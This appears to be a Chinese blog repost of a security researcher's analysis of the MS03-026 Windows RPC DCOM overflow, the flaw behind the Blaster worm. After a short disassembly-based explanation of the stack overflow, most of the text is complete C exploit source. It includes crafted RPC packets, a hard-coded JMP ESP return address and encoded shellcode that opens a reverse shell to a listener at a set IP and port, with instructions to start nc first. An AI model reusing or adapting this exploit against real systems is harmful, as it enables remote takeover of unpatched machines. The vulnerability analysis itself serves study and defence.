冲击波病毒内幕点滴（3）

技术2022-05-11 97

附2

LSD RPC 溢出漏洞之分析

转摘请注明作者和安全焦点

作者：FLASHSKY

作者单位：启明星辰积极防御实验室

WWW SITE：WWW.VENUSTECH.COM.CN WWW.XFOCUS.NET，WWW.SHOPSKY.COM

邮件：flashsky@xfocus.org,fangxing@venustech.com.cn,webmaster@shopsky.com

感谢BENJURRY做测试，翻译和代码的通用化处理。

邮件：benjurry@xfocus.org

LSD 的RPC溢出漏洞（MS03-26）其实包含了2个溢出漏洞，一个是本地的，一个是远程的。他们都是由一个通用接口导致的。

导致问题的调用如下：

hr = CoGetInstanceFromFile(pServerInfo,NULL,0,CLSCTX_REMOTE_SERVER,STGM_READWRITE,L"C://1234561111111111111111111111111.doc",1,&qi);

这个调用的文件名参数（第5个参数，会引起溢出），当这个文件名超长的时候，会导致客户端的本地溢出（在RPCSS中的GetPathForServer函数里只给了0X220堆栈的空间，但是是用lstrcpyw进行拷贝的），这个我们在这里就不深入研究了(不过这个API先会检查本地文件是否存在，在进行处理，因此由于建不了长文件，所以要利用这个溢出不能直接调用这个API，而是构造好包信息以后直接调用LPC的函数，有兴趣的可以自己去试。),我们来讲解一下远程的溢出。

在客户端给服务器传递这个参数的时候，会自动转化成如下格式：L“//servername/c$/1234561111111111111111111111111.doc"这样的形式传递给远程服务器，于是在远程服务器的处理中会先取出servername名，但是这里没做检查，给定了0X20（默认NETBIOS名）大小的空间，于是堆栈溢出产生了：

问题代码如下：

GetPathForServer：

.text:761543DA push ebp

.text:761543DB mov ebp, esp

.text:761543DD sub esp, 20h <-----0x20空间

.text:761543E0 mov eax, [ebp+arg_4]

.text:761543E3 push ebx

.text:761543E4 push esi

.text:761543E5 mov esi, [ebp+hMem]

.text:761543E8 push edi

.text:761543E9 push 5Ch

.text:761543EB pop ebx

.text:761543EC mov [eax], esi

.text:761543EE cmp [esi], bx

.text:761543F1 mov edi, esi

.text:761543F3 jnz loc_761544BF

.text:761543F9 cmp [esi+2], bx

.text:761543FD jnz loc_761544BF

.text:76154403 lea eax, [ebp+String1]《-----------写入的地址，只有0X20

.text:76154406 push 0

.text:76154408 push eax

.text:76154409 push esi 〈----------------------我们传入的文件名参数

.text:7615440A call GetMachineName

。。。。。。。。。。。。。。。。。。。。。。。。。。此函数返回的时候，溢出点生效

GetMachineName:

.text:7614DB6F mov eax, [ebp+arg_0]

.text:7614DB72 mov ecx, [ebp+arg_4]

.text:7614DB75 lea edx, [eax+4]

.text:7614DB78 mov ax, [eax+4]

.text:7614DB7C cmp ax, 5Ch 〈-----------------只判断0X5C

.text:7614DB80 jz short loc_7614DB93

.text:7614DB82 sub edx, ecx

.text:7614DB84

.text:7614DB84 loc_7614DB84: ; CODE XREF: sub_7614DA19+178j

.text:7614DB84 mov [ecx], ax 〈----------------写入上个只有0X20的空间，超过就溢出

.text:7614DB87 inc ecx

.text:7614DB88 inc ecx

.text:7614DB89 mov ax, [ecx+edx]

.text:7614DB8D cmp ax, 5Ch

.text:7614DB91 jnz short loc_7614DB84

.text:7614DB93

OK，我们现在就需要想法来利用这个漏洞，由于//SERVERNAME是由系统自动生成的，我们只能利用手工直接生成RPC的包来实现，另外SHELLCODE中不能包含0X5C，因为这样判断就是//SERVERNAME结束了。

下面就给出一个实现的代码，注意点如下：

1.由于RPCRT4，RPCSS中没有JMP ESP的代码，这里使用了OLE32.DLL中的，但是这可能是会重定位的，大家测试的时候

需要再确定或自己找一个存在的JMP ESP的代脉，我的这是WIN2000+SP3上的地址且OLE32未重定位情况下的。

2。这里使用了反向连接的SHELLCODE，需要先运行NC

3。程序中的SC的整体长度必须满足sizeof(sz)=12的关系，因为不是整数的话，整个包的长度会有一些填充，那么

计算就不满足我这里给出的一个简单关系了，会导致RPC包的解析无效果。

4。在溢出返回前，返回地址后面的2个参数还会使用，所以需要保证是个内存可写空间地址。

5，这里是直接使用堆栈溢出返回的，其实大家也可以尝试一下覆盖SEH，这里就不再多讲了。

#include <stdio.h>

#include <winsock2.h>

#include <windows.h>

#include <process.h>

#include <string.h>

#include <winbase.h>

unsigned char bindstr[]={

0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,

0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,

0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,

0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,

0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

unsigned char request1[]={

0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03

,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00

,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45

,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E

,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D

,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41

,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00

,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45

,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00

,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00

,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03

,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00

,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29

,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00

,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00

,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10

,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF

,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10

,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09

,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00

,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00

,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00

,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00

,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01

,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03

,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00

,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E

,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00

,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00

,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00

,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00

,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00};

unsigned char request2[]={

0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00

,0x00,0x00,0x5C,0x00,0x5C,0x00};

unsigned char request3[]={

0x5C,0x00

,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00

,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00

,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00

,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};

unsigned char sc[]=

"/x46/x00/x58/x00/x4E/x00/x42/x00/x46/x00/x58/x00"

"/x46/x00/x58/x00/x4E/x00/x42/x00/x46/x00/x58/x00/x46/x00/x58/x00"

"/x46/x00/x58/x00"

"/x46/x00/x58/x00/x25/x2b/xaa/x77" //JMP ESP地址 IN ole32.DLL，可能需要自己改动

"/x38/x6e/x16/x76/x0d/x6e/x16/x76" //需要是可写的内存地址

//下面是SHELLCODE，可以放自己的SHELLCODE，但必须保证sc的整体长度/16=12，不满足自己填充一些0X90吧

//SHELLCODE不存在0X00，0X00与0X5C

"/xeb/x02/xeb/x05/xe8/xf9/xff/xff/xff/x58/x83/xc0/x1b/x8d/xa0/x01"

"/xfc/xff/xff/x83/xe4/xfc/x8b/xec/x33/xc9/x66/xb9/x99/x01/x80/x30"

"/x93/x40/xe2/xfa"

// code

"/x7b/xe4/x93/x93/x93/xd4/xf6/xe7/xc3/xe1/xfc/xf0/xd2/xf7/xf7/xe1"

"/xf6/xe0/xe0/x93/xdf/xfc/xf2/xf7/xdf/xfa/xf1/xe1/xf2/xe1/xea/xd2"

"/x93/xd0/xe1/xf6/xf2/xe7/xf6/xc3/xe1/xfc/xf0/xf6/xe0/xe0/xd2/x93"

"/xd0/xff/xfc/xe0/xf6/xdb/xf2/xfd/xf7/xff/xf6/x93/xd6/xeb/xfa/xe7"

"/xc7/xfb/xe1/xf6/xf2/xf7/x93/xe4/xe0/xa1/xcc/xa0/xa1/x93/xc4/xc0"

"/xd2/xc0/xe7/xf2/xe1/xe7/xe6/xe3/x93/xc4/xc0/xd2/xc0/xfc/xf0/xf8"

"/xf6/xe7/xd2/x93/xf0/xff/xfc/xe0/xf6/xe0/xfc/xf0/xf8/xf6/xe7/x93"

"/xf0/xfc/xfd/xfd/xf6/xf0/xe7/x93/xf0/xfe/xf7/x93/xc9/xc1/x28/x93"

"/x93/x63/xe4/x12/xa8/xde/xc9/x03/x93/xe7/x90/xd8/x78/x66/x18/xe0"

"/xaf/x90/x60/x18/xe5/xeb/x90/x60/x18/xed/xb3/x90/x68/x18/xdd/x87"

"/xc5/xa0/x53/xc4/xc2/x18/xac/x90/x68/x18/x61/xa0/x5a/x22/x9d/x60"

"/x35/xca/xcc/xe7/x9b/x10/x54/x97/xd3/x71/x7b/x6c/x72/xcd/x18/xc5"

"/xb7/x90/x40/x42/x73/x90/x51/xa0/x5a/xf5/x18/x9b/x18/xd5/x8f/x90"

"/x50/x52/x72/x91/x90/x52/x18/x83/x90/x40/xcd/x18/x6d/xa0/x5a/x22"

"/x97/x7b/x08/x93/x93/x93/x10/x55/x98/xc1/xc5/x6c/xc4/x63/xc9/x18"

"/x4b/xa0/x5a/x22/x97/x7b/x14/x93/x93/x93/x10/x55/x9b/xc6/xfb/x92"

"/x92/x93/x93/x6c/xc4/x63/x16/x53/xe6/xe0/xc3/xc3/xc3/xc3/xd3/xc3"

"/xd3/xc3/x6c/xc4/x67/x10/x6b/x6c/xe7/xf0/x18/x4b/xf5/x54/xd6/x93"

"/x91/x93/xf5/x54/xd6/x91/x28/x39/x54/xd6/x97/x4e/x5f/x28/x39/xf9"

"/x83/xc6/xc0/x6c/xc4/x6f/x16/x53/xe6/xd0/xa0/x5a/x22/x82/xc4/x18"

"/x6e/x60/x38/xcc/x54/xd6/x93/xd7/x93/x93/x93/x1a/xce/xaf/x1a/xce"

"/xab/x1a/xce/xd3/x54/xd6/xbf/x92/x92/x93/x93/x1e/xd6/xd7/xc3/xc6"

"/xc2/xc2/xc2/xd2/xc2/xda/xc2/xc2/xc5/xc2/x6c/xc4/x77/x6c/xe6/xd7"

"/x6c/xc4/x7b/x6c/xe6/xdb/x6c/xc4/x7b/xc0/x6c/xc4/x6b/xc3/x6c/xc4"

"/x7f/x19/x95/xd5/x17/x53/xe6/x6a/xc2/xc1/xc5/xc0/x6c/x41/xc9/xca"

"/x1a/x94/xd4/xd4/xd4/xd4/x71/x7a/x50/x90/x90"

"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90";

unsigned char request4[]={

0x01,0x10

,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00

,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C

,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00

};

void main(int argc,char ** argv)

{

WSADATA WSAData;

SOCKET sock;

int len,len1;

SOCKADDR_IN addr_in;

short port=135;

unsigned char buf1[0x1000];

unsigned char buf2[0x1000];

unsigned short port1;

DWORD cb;

if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)

{

printf("WSAStartup error.Error:%d/n",WSAGetLastError());

return;

}

addr_in.sin_family=AF_INET;

addr_in.sin_port=htons(port);

addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]);

if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)

{

printf("Socket failed.Error:%d/n",WSAGetLastError());

return;

}

if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR)

{

printf("Connect failed.Error:%d",WSAGetLastError());

return;

}

port1 = htons (2300); //反向连接的端口

port1 ^= 0x9393;

cb=0XD20AA8C0; //反向连接的IP地址，这里是192。168。10。210，

cb ^= 0x93939393;

*(unsigned short *)&sc[330+0x30] = port1;

*(unsigned int *)&sc[335+0x30] = cb;

len=sizeof(sc);

memcpy(buf2,request1,sizeof(request1));

len1=sizeof(request1);

*(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(sc)/2; //计算文件名双字节长度

*(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(sc)/2;//计算文件名双字节长度

memcpy(buf2+len1,request2,sizeof(request2));

len1=len1+sizeof(request2);

memcpy(buf2+len1,sc,sizeof(sc));

len1=len1+sizeof(sc);

memcpy(buf2+len1,request3,sizeof(request3));

len1=len1+sizeof(request3);

memcpy(buf2+len1,request4,sizeof(request4));

len1=len1+sizeof(request4);

*(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+sizeof(sc)-0xc;

//计算各种结构的长度

*(DWORD *)(buf2+0x10)=*(DWORD *)(buf2+0x10)+sizeof(sc)-0xc;

*(DWORD *)(buf2+0x80)=*(DWORD *)(buf2+0x80)+sizeof(sc)-0xc;

*(DWORD *)(buf2+0x84)=*(DWORD *)(buf2+0x84)+sizeof(sc)-0xc;

*(DWORD *)(buf2+0xb4)=*(DWORD *)(buf2+0xb4)+sizeof(sc)-0xc;

*(DWORD *)(buf2+0xb8)=*(DWORD *)(buf2+0xb8)+sizeof(sc)-0xc;

*(DWORD *)(buf2+0xd0)=*(DWORD *)(buf2+0xd0)+sizeof(sc)-0xc;

*(DWORD *)(buf2+0x18c)=*(DWORD *)(buf2+0x18c)+sizeof(sc)-0xc;

if (send(sock,bindstr,sizeof(bindstr),0)==SOCKET_ERROR)

{

printf("Send failed.Error:%d/n",WSAGetLastError());

return;

}

len=recv(sock,buf1,1000,NULL);

if (send(sock,buf2,len1,0)==SOCKET_ERROR)

{

printf("Send failed.Error:%d/n",WSAGetLastError());

return;

}

len=recv(sock,buf1,1024,NULL);

}

补丁机理：

补丁把远程和本地的溢出都补了，呵呵，这个这么有名的东西，我也懒得多说了。

补记：

由于缺乏更多的技术细节，搞这个从上星期五到现在终于才搞定，惭愧，不过值得庆幸的是其间发现了RPC DCOM DOS的漏洞。先开始被本地溢出的迷惑了很久，怎么也无法远程进入这个函数，最后偶然的一次，让我错误的看花了眼，再远程调用的时候，以为GETSERVERPATH是存在本地溢出的GetPathForServer函数，，心中以为远程进入了GetPathForServer函数，仔细的跟踪，这才发现问题所在。感谢所有关心和指导我的同志们。

专利

最新回复(0)